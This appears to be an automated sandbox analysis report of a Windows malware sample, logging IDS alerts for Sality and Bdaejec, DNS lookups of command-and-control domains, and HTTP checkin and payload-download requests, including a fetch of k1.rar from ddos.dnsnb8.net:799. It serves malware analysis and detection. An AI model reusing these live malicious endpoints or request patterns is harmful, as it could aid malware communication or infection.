                              07/05/24-08:00:06.311326TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24971680192.168.2.644.221.84.105
                              07/05/24-08:00:09.880391TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972280192.168.2.644.221.84.105
                              07/05/24-08:00:06.909560TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24971880192.168.2.678.46.2.155
                              07/05/24-08:00:07.763277TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24971980192.168.2.637.230.104.89
                              07/05/24-08:00:03.315545UDP2838522ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6336353192.168.2.61.1.1.1
                              07/05/24-08:00:06.805804TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804971644.221.84.105192.168.2.6
                              07/05/24-08:00:09.129606TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972080192.168.2.654.244.188.177
                              07/05/24-08:00:03.544015TCP2807908ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin49710799192.168.2.644.221.84.105
                              07/05/24-08:00:10.394245TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972380192.168.2.644.221.84.105
                              07/05/24-08:00:10.955809TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972580192.168.2.678.46.2.155
                              07/05/24-08:00:11.733848TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972680192.168.2.637.230.104.89

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jul 5, 2024 08:00:03.537938118 CEST49710799192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:03.542771101 CEST7994971044.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:03.543601990 CEST49710799192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:03.544014931 CEST49710799192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:03.548825979 CEST7994971044.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:03.838006973 CEST4971280192.168.2.654.244.188.177
                              Jul 5, 2024 08:00:03.842852116 CEST804971254.244.188.177192.168.2.6
                              Jul 5, 2024 08:00:03.855412006 CEST4971280192.168.2.654.244.188.177
                              Jul 5, 2024 08:00:03.856779099 CEST4971280192.168.2.654.244.188.177
                              Jul 5, 2024 08:00:03.862957954 CEST804971254.244.188.177192.168.2.6
                              Jul 5, 2024 08:00:03.986773014 CEST7994971044.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:03.986865044 CEST7994971044.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:03.987584114 CEST49710799192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:03.998967886 CEST49710799192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:04.004163027 CEST7994971044.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:04.635207891 CEST804971254.244.188.177192.168.2.6
                              Jul 5, 2024 08:00:04.635273933 CEST4971280192.168.2.654.244.188.177
                              Jul 5, 2024 08:00:04.635389090 CEST804971254.244.188.177192.168.2.6
                              Jul 5, 2024 08:00:04.635458946 CEST4971280192.168.2.654.244.188.177
                              Jul 5, 2024 08:00:04.653597116 CEST4971280192.168.2.654.244.188.177
                              Jul 5, 2024 08:00:04.658627987 CEST804971254.244.188.177192.168.2.6
                              Jul 5, 2024 08:00:04.874154091 CEST4971580192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:04.878956079 CEST804971544.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:04.879723072 CEST4971580192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:04.879864931 CEST4971580192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:04.884593964 CEST804971544.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:05.376137018 CEST804971544.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:05.376159906 CEST804971544.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:05.381345034 CEST4971580192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:05.596782923 CEST4971580192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:05.604990959 CEST804971544.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:06.304564953 CEST4971680192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:06.309467077 CEST804971644.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:06.311142921 CEST4971680192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:06.311326027 CEST4971680192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:06.316145897 CEST804971644.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:06.805804014 CEST804971644.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:06.805826902 CEST804971644.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:06.806711912 CEST4971680192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:06.826670885 CEST4971680192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:06.831571102 CEST804971644.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:06.904500008 CEST4971880192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:06.909343004 CEST804971878.46.2.155192.168.2.6
                              Jul 5, 2024 08:00:06.909415007 CEST4971880192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:06.909559965 CEST4971880192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:06.914289951 CEST804971878.46.2.155192.168.2.6
                              Jul 5, 2024 08:00:07.565737009 CEST804971878.46.2.155192.168.2.6
                              Jul 5, 2024 08:00:07.565944910 CEST4971880192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:07.757761002 CEST4971980192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:07.763025045 CEST804971937.230.104.89192.168.2.6
                              Jul 5, 2024 08:00:07.763119936 CEST4971980192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:07.763277054 CEST4971980192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:07.768089056 CEST804971937.230.104.89192.168.2.6
                              Jul 5, 2024 08:00:08.504347086 CEST804971937.230.104.89192.168.2.6
                              Jul 5, 2024 08:00:08.504518032 CEST4971980192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:08.506711960 CEST4971980192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:08.511606932 CEST804971937.230.104.89192.168.2.6
                              Jul 5, 2024 08:00:08.747104883 CEST804971937.230.104.89192.168.2.6
                              Jul 5, 2024 08:00:08.747602940 CEST4971980192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:09.099657059 CEST4972080192.168.2.654.244.188.177
                              Jul 5, 2024 08:00:09.104454994 CEST804972054.244.188.177192.168.2.6
                              Jul 5, 2024 08:00:09.123538017 CEST4972080192.168.2.654.244.188.177
                              Jul 5, 2024 08:00:09.129606009 CEST4972080192.168.2.654.244.188.177
                              Jul 5, 2024 08:00:09.135504007 CEST804972054.244.188.177192.168.2.6
                              Jul 5, 2024 08:00:09.862687111 CEST804972054.244.188.177192.168.2.6
                              Jul 5, 2024 08:00:09.862761021 CEST804972054.244.188.177192.168.2.6
                              Jul 5, 2024 08:00:09.868007898 CEST4972080192.168.2.654.244.188.177
                              Jul 5, 2024 08:00:09.869509935 CEST4972080192.168.2.654.244.188.177
                              Jul 5, 2024 08:00:09.874267101 CEST804972054.244.188.177192.168.2.6
                              Jul 5, 2024 08:00:09.875143051 CEST4972280192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:09.880110979 CEST804972244.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:09.880222082 CEST4972280192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:09.880390882 CEST4972280192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:09.885241032 CEST804972244.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:10.366055965 CEST804972244.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:10.366137028 CEST4972280192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:10.366456985 CEST804972244.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:10.367054939 CEST4972280192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:10.367414951 CEST4972280192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:10.369745970 CEST4972380192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:10.371831894 CEST804972244.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:10.374670029 CEST804972344.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:10.393306971 CEST4972380192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:10.394244909 CEST4972380192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:10.399081945 CEST804972344.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:10.894288063 CEST804972344.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:10.894314051 CEST804972344.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:10.898937941 CEST4972380192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:10.928126097 CEST4972380192.168.2.644.221.84.105
                              Jul 5, 2024 08:00:10.933029890 CEST804972344.221.84.105192.168.2.6
                              Jul 5, 2024 08:00:10.938036919 CEST4971880192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:10.938365936 CEST4972580192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:10.943144083 CEST804972578.46.2.155192.168.2.6
                              Jul 5, 2024 08:00:10.943221092 CEST804971878.46.2.155192.168.2.6
                              Jul 5, 2024 08:00:10.955245018 CEST4971880192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:10.955332994 CEST4972580192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:10.955809116 CEST4972580192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:10.960565090 CEST804972578.46.2.155192.168.2.6
                              Jul 5, 2024 08:00:11.618431091 CEST804972578.46.2.155192.168.2.6
                              Jul 5, 2024 08:00:11.621129036 CEST4972580192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:11.728475094 CEST4971980192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:11.728784084 CEST4972680192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:11.733541012 CEST804971937.230.104.89192.168.2.6
                              Jul 5, 2024 08:00:11.733584881 CEST804972637.230.104.89192.168.2.6
                              Jul 5, 2024 08:00:11.733597994 CEST4971980192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:11.733670950 CEST4972680192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:11.733848095 CEST4972680192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:11.738648891 CEST804972637.230.104.89192.168.2.6
                              Jul 5, 2024 08:00:12.479939938 CEST804972637.230.104.89192.168.2.6
                              Jul 5, 2024 08:00:12.480020046 CEST4972680192.168.2.637.230.104.89
                              Jul 5, 2024 08:00:14.052526951 CEST4972580192.168.2.678.46.2.155
                              Jul 5, 2024 08:00:14.052712917 CEST4972680192.168.2.637.230.104.89

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Jul 5, 2024 08:00:01.504060030 CEST527479832192.168.2.685.17.167.196
                              Jul 5, 2024 08:00:03.315545082 CEST6336353192.168.2.61.1.1.1
                              Jul 5, 2024 08:00:03.487957954 CEST5222453192.168.2.61.1.1.1
                              Jul 5, 2024 08:00:03.503974915 CEST53522241.1.1.1192.168.2.6
                              Jul 5, 2024 08:00:03.526585102 CEST53633631.1.1.1192.168.2.6
                              Jul 5, 2024 08:00:03.565996885 CEST5593953192.168.2.61.1.1.1
                              Jul 5, 2024 08:00:03.770761967 CEST53559391.1.1.1192.168.2.6
                              Jul 5, 2024 08:00:04.657574892 CEST4984053192.168.2.61.1.1.1
                              Jul 5, 2024 08:00:04.853981018 CEST53498401.1.1.1192.168.2.6
                              Jul 5, 2024 08:00:05.824616909 CEST5074553192.168.2.61.1.1.1
                              Jul 5, 2024 08:00:05.833899975 CEST53507451.1.1.1192.168.2.6
                              Jul 5, 2024 08:00:06.102679968 CEST5544553192.168.2.61.1.1.1
                              Jul 5, 2024 08:00:06.303570032 CEST53554451.1.1.1192.168.2.6
                              Jul 5, 2024 08:00:06.834240913 CEST6093053192.168.2.61.1.1.1
                              Jul 5, 2024 08:00:06.854012012 CEST53609301.1.1.1192.168.2.6
                              Jul 5, 2024 08:00:07.662211895 CEST5827553192.168.2.61.1.1.1
                              Jul 5, 2024 08:00:07.673829079 CEST53582751.1.1.1192.168.2.6
                              Jul 5, 2024 08:00:07.677973032 CEST5332853192.168.2.61.1.1.1
                              Jul 5, 2024 08:00:07.745693922 CEST53533281.1.1.1192.168.2.6
                              Jul 5, 2024 08:00:08.952737093 CEST6353053192.168.2.61.1.1.1
                              Jul 5, 2024 08:00:09.075583935 CEST53635301.1.1.1192.168.2.6

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Jul 5, 2024 08:00:03.315545082 CEST192.168.2.61.1.1.10xc5c1Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:03.487957954 CEST192.168.2.61.1.1.10x7295Standard query (0)althawry.orgA (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:03.565996885 CEST192.168.2.61.1.1.10x9c21Standard query (0)www.careerdesk.orgA (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:04.657574892 CEST192.168.2.61.1.1.10xcb41Standard query (0)arthur.niria.bizA (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:05.824616909 CEST192.168.2.61.1.1.10xa9c6Standard query (0)amsamex.comA (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:06.102679968 CEST192.168.2.61.1.1.10xb648Standard query (0)apple-pie.inA (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:06.834240913 CEST192.168.2.61.1.1.10xf5f9Standard query (0)ahmediye.netA (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:07.662211895 CEST192.168.2.61.1.1.10x19b0Standard query (0)g2.arrowhitech.comA (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:07.677973032 CEST192.168.2.61.1.1.10xa762Standard query (0)ampyazilim.com.trA (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:08.952737093 CEST192.168.2.61.1.1.10xed25Standard query (0)althawry.orgA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Jul 5, 2024 08:00:03.503974915 CEST1.1.1.1192.168.2.60x7295Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:03.526585102 CEST1.1.1.1192.168.2.60xc5c1No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:03.770761967 CEST1.1.1.1192.168.2.60x9c21No error (0)www.careerdesk.org54.244.188.177A (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:04.853981018 CEST1.1.1.1192.168.2.60xcb41No error (0)arthur.niria.biz44.221.84.105A (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:05.833899975 CEST1.1.1.1192.168.2.60xa9c6Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:06.303570032 CEST1.1.1.1192.168.2.60xb648No error (0)apple-pie.in44.221.84.105A (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:06.854012012 CEST1.1.1.1192.168.2.60xf5f9No error (0)ahmediye.net78.46.2.155A (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:07.673829079 CEST1.1.1.1192.168.2.60x19b0Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:07.745693922 CEST1.1.1.1192.168.2.60xa762No error (0)ampyazilim.com.tr37.230.104.89A (IP address)IN (0x0001)false
                              Jul 5, 2024 08:00:09.075583935 CEST1.1.1.1192.168.2.60xed25Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • ddos.dnsnb8.net:799
                              • www.careerdesk.org
                              • arthur.niria.biz
                              • apple-pie.in
                              • ahmediye.net
                              • ampyazilim.com.tr

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.64971044.221.84.1057995344C:\Users\user\AppData\Local\Temp\rksowY.exe
                              TimestampBytes transferredDirectionData
                              Jul 5, 2024 08:00:03.544014931 CEST288OUTGET /cj//k1.rar HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                              Host: ddos.dnsnb8.net:799
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.64971254.244.188.177805352C:\Users\user\Desktop\1.0.0.2.exe
                              TimestampBytes transferredDirectionData
                              Jul 5, 2024 08:00:03.856779099 CEST201OUTGET /images/xs.jpg?5059c3=10531718 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: www.careerdesk.org
                              Cache-Control: no-cache
                              Jul 5, 2024 08:00:04.635207891 CEST671INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Fri, 05 Jul 2024 06:00:04 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=23c464339208da2a95574fbd506ebd72|8.46.123.33|1720159204|1720159204|0|1|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.64971544.221.84.105805352C:\Users\user\Desktop\1.0.0.2.exe
                              TimestampBytes transferredDirectionData
                              Jul 5, 2024 08:00:04.879864931 CEST192OUTGET /xs.jpg?51fbda=48356010 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: arthur.niria.biz
                              Cache-Control: no-cache
                              Jul 5, 2024 08:00:05.376137018 CEST662INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Fri, 05 Jul 2024 06:00:05 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=f61c3ab837e78a3dbee4d750570963c6|8.46.123.33|1720159205|1720159205|0|1|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.64971644.221.84.105805352C:\Users\user\Desktop\1.0.0.2.exe
                              TimestampBytes transferredDirectionData
                              Jul 5, 2024 08:00:06.311326027 CEST195OUTGET /images/xs.jpg?554c8c=39131092 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: apple-pie.in
                              Cache-Control: no-cache
                              Jul 5, 2024 08:00:06.805804014 CEST410INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Fri, 05 Jul 2024 06:00:06 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=a1590c081175a697dce15a514e641dbf|8.46.123.33|1720159206|1720159206|0|1|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.64971878.46.2.155805352C:\Users\user\Desktop\1.0.0.2.exe
                              TimestampBytes transferredDirectionData
                              Jul 5, 2024 08:00:06.909559965 CEST187OUTGET /xs.jpg?5827cf=5777359 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: ahmediye.net
                              Cache-Control: no-cache
                              Jul 5, 2024 08:00:07.565737009 CEST403INHTTP/1.1 404 Not Found
                              Date: Fri, 05 Jul 2024 06:00:07 GMT
                              Server: Apache
                              Content-Length: 258
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.64971937.230.104.89805352C:\Users\user\Desktop\1.0.0.2.exe
                              TimestampBytes transferredDirectionData
                              Jul 5, 2024 08:00:07.763277054 CEST201OUTGET /images/xs2.jpg?6cbf0c=21380388 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: ampyazilim.com.tr
                              Cache-Control: no-cache
                              Jul 5, 2024 08:00:08.504347086 CEST933INHTTP/1.1 301 Moved Permanently
                              Connection: Keep-Alive
                              Keep-Alive: timeout=5, max=100
                              content-type: text/html
                              content-length: 707
                              date: Fri, 05 Jul 2024 06:00:08 GMT
                              location: http://ampyazilim.com.tr/images/xs2.jpg?1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                              Jul 5, 2024 08:00:08.506711960 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: ampyazilim.com.tr
                              Cache-Control: no-cache
                              Connection: Keep-Alive
                              Jul 5, 2024 08:00:08.747104883 CEST646INHTTP/1.1 200 OK
                              Connection: Keep-Alive
                              Keep-Alive: timeout=5, max=100
                              cache-control: max-age=84600, public
                              expires: Fri, 12 Jul 2024 06:00:08 GMT
                              content-type: image/jpeg
                              last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                              accept-ranges: bytes
                              content-length: 340
                              date: Fri, 05 Jul 2024 06:00:08 GMT
                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                              Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.64972054.244.188.177805352C:\Users\user\Desktop\1.0.0.2.exe
                              TimestampBytes transferredDirectionData
                              Jul 5, 2024 08:00:09.129606009 CEST306OUTGET /images/xs.jpg?ad5654=34079484 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: www.careerdesk.org
                              Cache-Control: no-cache
                              Cookie: snkz=8.46.123.33; btst=23c464339208da2a95574fbd506ebd72|8.46.123.33|1720159204|1720159204|0|1|0
                              Jul 5, 2024 08:00:09.862687111 CEST594INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Fri, 05 Jul 2024 06:00:09 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
